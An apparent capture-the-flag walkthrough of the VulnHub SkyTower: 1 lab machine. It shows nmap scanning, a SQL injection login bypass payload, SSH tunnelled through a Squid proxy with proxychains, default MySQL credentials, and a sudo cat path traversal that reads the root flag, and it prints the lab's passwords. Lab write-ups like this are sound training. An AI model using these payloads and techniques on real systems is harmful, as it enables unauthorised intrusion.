SkyTower: 1
SkyTower: 1, made by Telspace. Download & walkthrough links are available.
www.vulnhub.com
Nmap
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn’t have a title (text/html).
3128/tcp open http-proxy Squid http proxy 3.1.20
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2–3.10, Linux 3.2–3.16
Uptime guess: 198.838 days (since Tue Mar 19 16:24:36 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zerosTRACEROUTE
HOP RTT ADDRESS
1 0.31 ms 10.0.0.13
Here at port 80 we get to see that there is a login page when we bypass the login page using sql injection queries (‘ || 1=1#)
And we get to see that there are password for john user
And using this we get the login to ssh
But we are not having ssh port open , but having proxy port open so we just used it in following ways
* edited the /etc/proxychains.conf
http 10.0.0.13 3128
#add this line at the end * usage of proxy
proxychains ssh john@10.0.0.13
and enter the password here is john
But when we get connected to ssh it drops out the connection because .bashrc is not allowing us to move in , so we tried the another way to get a proper interactive shell
used : proxychains ssh john@10.0.0.13 “/bin/bash”this will give us a bash shell and we won't get a dropout from connection
And for post enumeration we run the LinEnum.sh and found that the mysql is using default creds root:root and we got the creds of all users at SkyTech database when we log in with “SARA” we see that sara is sudo user
sara@SkyTower:/tmp$ sudo -l
Matching Defaults entries for sara on this host:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser sara may run the following commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
So here we are having sudo rights at cat command which we use at /accounts directory , so we cat the root flag using
sara@SkyTower:/tmp$ sudo /bin/cat /accounts/../../../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytowerHere we got the root creds to ssh , Again used proxychains to ssh the root
proxychains ssh root@10.0.0.13 "/bin/bash"used /bin/bash because .bashrc is not allowing us to stay connected as we are getting our shell closed as we get connected to it
Hence got the root 👍
……………………………….COWABUNGA…………………………………
